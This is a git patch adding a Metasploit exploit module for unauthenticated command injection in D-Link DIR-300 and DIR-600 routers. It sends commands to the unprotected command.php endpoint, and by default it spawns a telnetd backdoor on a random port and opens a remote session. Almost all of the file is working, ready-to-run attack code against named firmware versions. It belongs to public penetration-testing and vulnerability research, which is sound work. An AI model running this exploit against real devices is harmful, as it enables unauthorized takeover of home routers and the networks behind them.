From dd35495fb847ef97512dd0d8fd3dcab1dc9d1d79 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 5 Aug 2013 22:28:59 +0200 Subject: [PATCH] dir 300 and 600 auxiliary module replacement --- .../http/dlink_command_php_exec_noauth.rb | 161 ++++++++++++++++++ 1 file changed, 161 insertions(+) create mode 100644 modules/exploits/linux/http/dlink_command_php_exec_noauth.rb diff --git a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb new file mode 100644 index 0000000000..632e4fa752 --- /dev/null +++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb @@ -0,0 +1,161 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::CommandShell + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link Devices Unauthenticated Remote Command Execution', + 'Description' => %q{ + Different D-Link Routers are vulnerable to OS command injection via the web + interface. The vulnerability exists in command.php, which is accessible without + authentication. This module has been tested with the versions DIR-600 2.14b01, + DIR-300 rev B 2.13. + Two target are included, first to start a telnetd service and establish a session over + it and second to run commands via the CMD target. There is no wget or tftp client to + upload an elf backdoor easily. + According to the vulnerability discoverer, more D-Link devices may affected. + }, + 'Author' => + [ + 'Michael Messner ', # Vulnerability discovery and Metasploit module + 'juan vazquez' # minor help with msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '89861' ], + [ 'EDB', '24453' ], + [ 'BID', '57734' ], + [ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ], + [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ] + ], + 'DisclosureDate' => 'Feb 04 2013', + 'Privileged' => true, + 'Platform' => ['linux','unix'], + 'Payload' => + { + 'DisableNops' => true, + }, + 'Targets' => + [ + [ 'CMD', #all devices + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix' + } + ], + [ 'Telnet', #all devices - default target + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix' + } + ], + ], + 'DefaultTarget' => 1 + )) + end + + def exploit + if target.name =~ /CMD/ + exploit_cmd + else + exploit_telnet + end + end + + def exploit_cmd + if not (datastore['CMD']) + fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") + end + cmd = "#{payload.encoded}; echo end" + res = request(cmd) + if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + + if res.body.include?("end") + print_good("#{rhost}:#{rport} - Exploited successfully\n") + vprint_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n") + vprint_line("#{rhost}:#{rport} - Output: #{res.body}") + else + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + + return + end + + def exploit_telnet + telnetport = rand(65535) + + vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}") + + cmd = "telnetd -p #{telnetport}" + + #starting the telnetd gives no response + request(cmd) + + begin + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) + + if sock + print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") + add_socket(sock) + else + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") + end + + print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" + auth_info = { + :host => rhost, + :port => telnetport, + :sname => 'telnet', + :user => "", + :pass => "", + :source_type => "exploit", + :active => true + } + report_auth_info(auth_info) + merge_me = { + 'USERPASS_FILE' => nil, + 'USER_FILE' => nil, + 'PASS_FILE' => nil, + 'USERNAME' => nil, + 'PASSWORD' => nil + } + start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) + rescue + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not handle the backdoor service") + end + return + end + + def request(cmd) + + uri = '/command.php' + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'vars_post' => { + "cmd" => cmd + } + }) + return res + rescue ::Rex::ConnectionError + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + end + end +end